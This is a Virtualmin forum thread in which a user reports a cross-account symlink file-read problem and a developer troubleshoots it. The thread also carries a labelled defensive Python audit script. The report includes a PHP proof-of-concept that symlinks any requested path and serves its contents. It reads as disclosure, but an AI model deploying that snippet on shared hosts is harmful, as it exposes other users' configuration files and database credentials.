Dear Virtualmin team,
I found that Virtualmin on my box can have its user permissions bypassed by creating a symlink file. Put simply, user A creates a .txt file that links to a config.php file in another user's home dir, and then he can easily read it.
$k = $_GET['c'];
$flib = "data.txt";
if ($k == "") {
    die;
} else {
    unlink($flib);
    $sym = $k;
    $link = getcwd() . "/" . $flib;
    symlink($sym, $link);
    if ($k{0} == "/") {
        echo " window.location = '" . $flib . "'";
    } else {
        echo "<pre>";
        echo readlink($flib) . "\n";
        echo "Filesize: " . linkinfo($flib) . "B\n\n";
        $ddir = getcwd();
        $file2 = str_replace($DOCUMENT_ROOT, '', $ddir);
        $file2 = "http://" . $SERVER_NAME . $filee . $flib;
        $result = file_get_contents($file2);
        echo $result;
    }
}
I'm not sure whether moving the ls and ln commands to the /root folder would fix this issue or not. Tell me more about what happens if I move the 2 commands, and whether Virtualmin will stop working properly.
Thanks, NhanCM
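A defender-side audit, added here as an example (not from the original report or from Virtualmin): a Python 3 script that walks one user's home without following links and reports every symlink whose target resolves outside that home. The sample layout it builds in a temp dir is constructed to mirror the report (a .txt link in one user's public_html pointing at another user's config.php); the directory and file names are assumptions.

```python
import os
import tempfile
from pathlib import Path

def find_escaping_symlinks(home):
    """Walk `home` without following links and return (link, resolved_target)
    for every symlink whose final target lies outside `home`."""
    home_path = Path(home).resolve()
    findings = []
    for root, dirs, files in os.walk(home, followlinks=False):
        for name in dirs + files:
            link = Path(root) / name
            if not link.is_symlink():
                continue
            # resolve() follows chains of links, so a link to a link is handled too
            resolved = (link.parent / os.readlink(link)).resolve()
            try:
                resolved.relative_to(home_path)   # inside home: fine
            except ValueError:
                findings.append((str(link), str(resolved)))
    return sorted(findings)

def build_sample_homes():
    """Constructed sample: two home dirs under a temp dir, one holding a link
    of the kind the report describes (data.txt -> other user's config.php)."""
    base = Path(tempfile.mkdtemp())
    victim = base / "victim" / "public_html"
    attacker = base / "attacker" / "public_html" / "test"
    victim.mkdir(parents=True)
    attacker.mkdir(parents=True)
    (victim / "config.php").write_text("<?php $db_pass = 'secret'; ?>\n")
    (attacker / "data.txt").symlink_to(victim / "config.php")  # crosses homes
    (base / "attacker" / "notes.txt").write_text("harmless\n")
    (attacker / "notes.txt").symlink_to("../../notes.txt")      # stays inside
    return str(base / "attacker")

if __name__ == "__main__":
    for link, target in find_escaping_symlinks(build_sample_homes()):
        print(f"{link} -> {target}")
```

Run it against a real /home/username to list links that leave that home; a link that stays inside the home (like notes.txt above) is not reported.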
Comments
Submitted by JamieCameron on Thu, 10/06/2011 - 12:02 Comment #1
Do you mean one user can read another user's files via a symlink like this?
This shouldn't be possible, as each user's home dir is readable only by the domain's group.
Submitted by nhancm on Thu, 10/06/2011 - 12:08 Comment #2
@JamieCameron: Yes, one user can read all of the other users' dirs on my box; this attack is also called a local attack.
And I wish anyone here could fix this so that a user cannot access anything outside his/her own directory folder.
Thanks,
Submitted by JamieCameron on Thu, 10/06/2011 - 12:13 Comment #3
The default settings in Virtualmin are for home directories to be non-world-readable.
What are the permissions on the target user's home directory?
Submitted by nhancm on Thu, 10/06/2011 - 12:20 Comment #4
-rw-r--r-- on *.php for all, as default when uploading via an FTP client. <<< this is the result when I try ls -la *.php
Yes, home users are jailed to their /home directory folder, and that is the default config now on my box.
Thanks,
Submitted by JamieCameron on Thu, 10/06/2011 - 12:28 Comment #5
How about the /home/targetusername directory? I'd be interested to see the permissions as shown by
ls -ld /home/targetusername
Submitted by nhancm on Thu, 10/06/2011 - 12:43 Comment #6
-rw-r--r-- too; this is the default on the target directory.
Submitted by JamieCameron on Thu, 10/06/2011 - 12:52 Comment #7
Ok .. so if you SSH in as the user who created the symlink, can you read from it with
cat
?
Submitted by nhancm on Thu, 10/06/2011 - 13:05 Comment #8
NO.
The funny thing is that, but in PHP getcontent is OKAY:
phim_moss@nltit $ cat /home/phim_moss/public_html/test/sniper4.txt
cat: /home/phim_moss/public_html/test/sniper4.txt: Permission denied
Submitted by JamieCameron on Thu, 10/06/2011 - 13:10 Comment #9
Which PHP execution mode do you have enabled for this domain (at Server Configuration -> Website Options) ?
Submitted by nhancm on Thu, 10/06/2011 - 13:31 Comment #10
Here is my screenshot: https://lh6.googleusercontent.com/-7kHoP0_2zKU/To3zlAnNVcI/AAAAAAAAAGk/K...
FCGId PHP
Submitted by JamieCameron on Thu, 10/06/2011 - 13:59 Comment #11
That's odd, as PHP scripts should execute with domain owner permissions.
If you upload a simple script in the source domain that prints the permissions it runs as, like:
<?php
system("id -a");
?>
what does it output?
Submitted by nhancm on Thu, 10/06/2011 - 21:12 Comment #12
uid=508(phim_moss) gid=508(phim_moss) groups=508(phim_moss) <<< the output.
Sorry for the late reply, it is 9am in Vietnam now.
Submitted by JamieCameron on Thu, 10/06/2011 - 21:59 Comment #13
Ok, so it is clearly running with domain owner permissions ...
I don't see how it could possibly access a file that you can't access from the shell. I'd have to login to your system myself as the source user to see what is going on.